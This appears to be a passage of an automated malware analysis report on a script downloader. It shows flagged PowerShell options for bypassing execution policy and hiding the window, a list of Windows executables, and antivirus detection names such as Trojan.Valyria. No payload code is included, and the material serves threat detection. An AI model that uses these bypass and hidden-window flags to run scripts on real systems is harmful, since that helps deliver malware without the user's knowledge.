option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -executionpolicy unrestricted | value | Attempts to bypass execution policy | ||||||
option | -w hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
Cynet | Malicious (score: 99) |
Skyhigh | HTA/Downloader.f |
ALYac | VB:Trojan.Valyria.7482 |
VIPRE | VB:Trojan.Valyria.7482 |
Arcabit | VB:Trojan.Valyria.D1D3A |
ESET-NOD32 | VBS/Agent.QVR |
McAfee | HTA/Downloader.f |
Avast | Script:SNH-gen [Drp] |
Kaspersky | HEUR:Trojan-Downloader.Script.Generic |
BitDefender | VB:Trojan.Valyria.7482 |
NANO-Antivirus | Trojan.Script.Downloader.jpdglv |
MicroWorld-eScan | VB:Trojan.Valyria.7482 |
Rising | Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI) |
Emsisoft | VB:Trojan.Valyria.7482 (B) |
F-Secure | Malware.VBS/Dldr.Agent.VPLT |
FireEye | VB:Trojan.Valyria.7482 |
Ikarus | Trojan.VBS.Agent |
Detected | |
Avira | VBS/Dldr.Agent.VPLT |
GData | VB:Trojan.Valyria.7482 |
Varist | VBS/Agent.AZC!Eldorado |
MAX | malware (ai score=81) |
Fortinet | VBS/Agent.BSD!tr |
AVG | Script:SNH-gen [Drp] |